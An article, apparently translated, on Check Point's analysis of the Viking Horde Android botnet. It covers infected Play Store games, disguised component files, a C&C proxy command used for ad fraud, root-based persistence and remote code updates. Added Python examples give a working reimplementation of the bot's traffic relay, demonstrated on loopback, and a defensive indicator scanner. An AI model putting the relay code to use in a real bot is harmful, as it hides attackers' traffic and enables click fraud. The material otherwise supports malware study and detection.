Check Point's research team discovered a new Android malware family in the Google Play Store and named it Viking Horde. It can commit ad fraud, take part in DDoS attacks, send spam, and more. At least five infected apps passed Google Play's malware scanning. On both rooted and non-rooted devices, Viking Horde enrolls the device in a botnet that routes ad clicks through proxied IP addresses to disguise their origin, so that the attacker can earn advertising revenue. A botnet is a group of devices controlled by an attacker without the owners' knowledge; what the "bots" can do depends on the computing power of each device, and the larger the botnet, the more it can do. On rooted devices, Viking Horde can additionally deliver further malicious payloads, giving the attacker remote arbitrary code execution, and it abuses its root privileges to make itself hard to remove.

Viking Horde introduction
The most downloaded app in the Viking Horde family is Viking Jump, which was downloaded 50,000-100,000 times after being uploaded to Google Play on April 15. In some markets Viking Jump even reached the top of the Google Play free-app charts. The oldest infected app, Wi-Fi Plus, was submitted on March 29; the others were Memory Booster, Parrot Copter, and Simple 2048. All of the infected apps had low ratings, which the researchers speculate is because users noticed odd behaviour such as the app requesting root permissions. The botnet is spread across countries around the world; the research team obtained the distribution of victims from data collected on a C&C server. (Victim distribution; source: Check Point Mobile Threat Research Team, May 6, 2016.)

How Viking Horde works

After studying the Viking Horde code and its C&C server, the researchers summarised its behaviour in a flowchart. The steps are as follows.

1. The malware is first downloaded from Google Play. When the game app launches, it installs several components outside the app's own directory, under names chosen to look system-related: core.bin, clib.so, android.bin and update.bin. If the device is not rooted, the components are written to the SD card; if it is rooted, they go under /data. One of these files is used to exchange information between components; another holds the generated names of all the components so that the other components can locate them.

2. Next, the malware checks whether the device is rooted. If it is, it activates two additional components, app_exec and the watchdog (both described below).
If the device is not rooted, the malware instead loads the app_exec file as a shared library and calls its functions through JNI (the Java Native Interface, which lets Java code call into native code). In either case, once app_exec is in place it opens a TCP connection to the C&C server and starts communicating. The commands exchanged over this connection include the create_proxy command described in the next step.
3. The next step is to carry out the malicious activity through an anonymous proxy connection. The C&C server sends a "create_proxy" command carrying two IP addresses and ports as parameters. The bot uses them to open two sockets, one to the remote server and one to the remote target, then reads the data arriving on the first socket and forwards it to the target host. The attacker's traffic thus appears to originate from the infected device, which hides the attacker's own IP address.

Botnet activity

Even when the device is not rooted, Viking Horde turns it into a proxy that can send and receive traffic on the attacker's behalf. The report shows an infected device as it appears in the attacker's C&C panel: the "remote" entry is the proxy's IP address and the "socks" IP is the C&C server's. The panel also records details about the device, including OS version, battery status and GPS coordinates; the device in the example was located in the United States on the T-Mobile network.

Viking C&C server

The botnet is controlled by many C&C servers, each managing hundreds of devices. The primary goal of the malware is to hijack the device and use it to simulate clicks on website ads for profit; the proxy is needed to get past advertisers' anti-fraud mechanisms, which would otherwise flag the traffic. Some user reviews, shown in a screenshot in the report, also say the app sends premium-rate text messages. Beyond click fraud, the botnet can be used for DDoS attacks, sending spam, and distributing further malware.

Persistence

The malware uses several methods to stay on the device. First, the components it installs carry system-like names, which makes them hard to locate and remove. If the device is rooted, two further mechanisms resist deletion. The app_exec component monitors whether the main app still exists; if the user uninstalls it, app_exec decrypts a component called com.android.security and installs it silently. This component is hidden and runs after the next reboot.
The watchdog component installs updates for app_exec, and if app_exec is deleted, the watchdog reinstalls it from the update directory. Some users noticed this reinstall behaviour and reported it in reviews (screenshot in the report).

Additional components for rooted devices

Probably the most dangerous functionality is the update mechanism. app_exec downloads the latest binary from the server and stores it in the /data directory under the name app_exec_update. The watchdog periodically checks whether that update file exists and, if it does, replaces app_exec with it. Viking Horde can therefore fetch a new binary on the server's command and have the watchdog swap it in, which means any code the attacker chooses can be downloaded and executed on the device.

Appendix 1: app package names
Appendix 2: C&C Server List
Appendix 3: SHA256 hashes of the infected executables
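The create_proxy relay from step 3 of "How Viking Horde works", as an added example written for this page (it is not Viking Horde's code and not Check Point's): a Python bot-side handler that parses a command, connects the two sockets and copies bytes between them, plus a loopback demonstration. The command syntax "create_proxy <server-ip>:<port> <target-ip>:<port>", the decision to relay replies back as well as forward data, and the constructed "operator" and "target" endpoints are assumptions; the page describes only the two addresses and the forward copy.

```python
import socket
import threading

# Added example, not Viking Horde code. The command layout is an assumption:
#   create_proxy <server-ip>:<server-port> <target-ip>:<target-port>
def parse_create_proxy(cmd):
    """Return ((server_host, server_port), (target_host, target_port))."""
    parts = cmd.split()
    if len(parts) != 3 or parts[0] != "create_proxy":
        raise ValueError("not a create_proxy command: %r" % cmd)

    def host_port(s):
        host, port = s.rsplit(":", 1)
        return host, int(port)

    return host_port(parts[1]), host_port(parts[2])


def recv_all(sock):
    """Read until the peer closes its sending side (EOF)."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then pass the EOF on to dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def run_proxy(cmd, timeout=5.0):
    """Bot-side handler: open both sockets and relay until both sides close.
    The page describes the forward copy (server -> target); relaying replies
    back is an assumption, since a one-way proxy is useless for ad fraud."""
    (s_host, s_port), (t_host, t_port) = parse_create_proxy(cmd)
    to_server = socket.create_connection((s_host, s_port), timeout=timeout)
    to_target = socket.create_connection((t_host, t_port), timeout=timeout)
    fwd = threading.Thread(target=pump, args=(to_server, to_target), daemon=True)
    rev = threading.Thread(target=pump, args=(to_target, to_server), daemon=True)
    fwd.start()
    rev.start()
    fwd.join(timeout)
    rev.join(timeout)
    to_server.close()
    to_target.close()


def demo():
    """Loopback demonstration with a constructed 'operator' (stands in for the
    attacker's server) and 'target' (stands in for an ad site). Returns what
    each side saw, so the effect of the relay can be checked."""
    operator = socket.socket()
    operator.bind(("127.0.0.1", 0))
    operator.listen(1)
    target = socket.socket()
    target.bind(("127.0.0.1", 0))
    target.listen(1)
    seen = {}

    def operator_side():
        conn, _ = operator.accept()
        with conn:
            conn.sendall(b"GET /ad?click=1 HTTP/1.0\r\n\r\n")  # constructed request
            conn.shutdown(socket.SHUT_WR)
            seen["operator_got"] = recv_all(conn)

    def target_side():
        conn, peer = target.accept()
        with conn:
            seen["target_peer"] = peer[0]  # the bot's address, not the operator's
            seen["target_got"] = recv_all(conn)
            conn.sendall(b"HTTP/1.0 200 OK\r\n\r\nclicked\n")  # constructed reply
            conn.shutdown(socket.SHUT_WR)

    threads = [threading.Thread(target=operator_side), threading.Thread(target=target_side)]
    for t in threads:
        t.start()
    cmd = "create_proxy 127.0.0.1:%d 127.0.0.1:%d" % (
        operator.getsockname()[1], target.getsockname()[1])
    run_proxy(cmd)
    for t in threads:
        t.join(5)
    operator.close()
    target.close()
    return seen


if __name__ == "__main__":
    print(demo())
```

The point of the relay is visible in `target_peer`: the ad site only ever sees the bot's address, so per-IP anti-fraud checks see one click from one phone, and blocking that address costs the operator nothing but one bot. On a real device the detection opportunity is the outbound TCP session from a game app to a C&C address that stays open and carries a second connection's traffic.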
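The indicators the report gives (the four disguised component names and their drop locations from step 1, the app_exec/watchdog pair, the staged app_exec_update binary and the hidden com.android.security package from the persistence and update sections) lend themselves to a quick triage check. The following is an added example, not Check Point's tooling: a Python scan over a directory listing pulled from a device that groups hits by indicator class and turns them into findings. The drop-directory prefixes, the on-disk path at which the hidden package would appear, and the sample listing are assumptions and constructed data.

```python
import posixpath
from collections import defaultdict

# Added example, not Check Point's or the malware's code. Names come from the
# report; the drop directories and the on-disk path of the hidden package are
# assumptions about where these artifacts would show up in a filesystem listing.
DISGUISED_COMPONENTS = {"core.bin", "clib.so", "android.bin", "update.bin"}
NATIVE_COMPONENTS = {"app_exec", "watchdog"}
UPDATE_STAGING = "app_exec_update"
HIDDEN_PACKAGE = "com.android.security"
# SD card on non-rooted devices, /data on rooted ones; sdcard mount names vary by device.
DROP_DIRS = ("/sdcard/", "/storage/", "/mnt/sdcard/", "/data/")


def classify(path):
    """Map one absolute path to an indicator class, or None if not of interest."""
    name = posixpath.basename(path)
    if name == UPDATE_STAGING:
        return "staged-update"
    if name in NATIVE_COMPONENTS:
        return "native-component"
    if name in DISGUISED_COMPONENTS:
        return "disguised-component"
    if HIDDEN_PACKAGE in path:
        return "hidden-package"
    return None


def scan_listing(lines):
    """Group indicator hits by class. Input is one absolute path per line,
    e.g. a recursive directory listing taken from the device."""
    hits = defaultdict(list)
    for raw in lines:
        path = raw.strip()
        if not path.startswith(DROP_DIRS):
            continue
        kind = classify(path)
        if kind:
            hits[kind].append(path)
    return dict(hits)


def assess(hits):
    """Turn raw hits into findings. One system-looking name is weak evidence;
    several of them together in a drop directory is the pattern the report describes."""
    findings = []
    disguised = hits.get("disguised-component", [])
    if len(disguised) >= 2:
        findings.append("%d disguised component files in a drop directory: %s"
                        % (len(disguised), ", ".join(sorted(disguised))))
    if "native-component" in hits:
        findings.append("app_exec/watchdog present (rooted-device payload): "
                        "deleting one gets it reinstalled by the other")
    if "staged-update" in hits:
        findings.append("app_exec_update staged under /data: "
                        "watchdog will swap it in as the new app_exec")
    if "hidden-package" in hits:
        findings.append("com.android.security installed: "
                        "reinstalled by app_exec if the game app is removed")
    return findings


# Constructed listing for demonstration, not data from a real device.
SAMPLE_LISTING = [
    "/data/app/com.example.game-1/base.apk",
    "/data/core.bin",
    "/data/clib.so",
    "/data/android.bin",
    "/data/update.bin",
    "/data/app_exec",
    "/data/watchdog",
    "/data/app_exec_update",
    "/data/app/com.android.security-1/base.apk",
    "/system/lib/libc.so",
    "/sdcard/DCIM/photo.jpg",
]

if __name__ == "__main__":
    for line in assess(scan_listing(SAMPLE_LISTING)):
        print(line)
```

Because the persistence components reinstall each other, the findings are meant to steer the response rather than a cleanup script: removing app_exec alone on a rooted device only triggers the watchdog, and removing the game app only triggers the hidden package, so all of the flagged files and packages have to go in one pass, with the update staging file removed first so nothing can be swapped back in.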